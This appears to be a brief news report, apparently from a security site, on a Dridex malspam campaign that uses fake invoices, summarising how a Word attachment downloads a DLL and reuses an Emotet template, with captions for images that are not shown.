The fake pdf attached to the "PURCHASE ORDER 05-30-2023" email contains a link, from which you download a tgz file with a TAR, inside which there is an exe: the malware.
Cybercrime, new Dridex global campaign via false invoices
Technical analysis by the malware Hunter JAMESWT
New global Dridex campaign with the lure of false invoices. The email contains a link that downloads a Word file, which then downloads a DLL and infects the machine with malware. The attachment, however, uses the same template as Emotet
Dridex is hiding behind a new cybercrime malspam campaign, which uses false invoices to convey the banking trojan in many countries. The text, written in English, refers to a payment with a link. This then leads the download of a Word document on the victim’s computer, which contacts some malicious links and downloads a DLL. This starts the malware infection chain. Furthermore, each email contains a different link. If, however, it is detected that the Doc has already been downloaded previously, the user is redirected to another site (https: //www.solvay [.com / en /). Moreover, the attachment uses the same template as the Emotet Doc.
The email text
The Word attachment from which the DLL that infects the computer with malware is downloaded
Emotet template variant
The urls contacted by the DOC to download the Dridex DLL
The PowerShell launched by the Doc with the urls inside
Some Doc Urls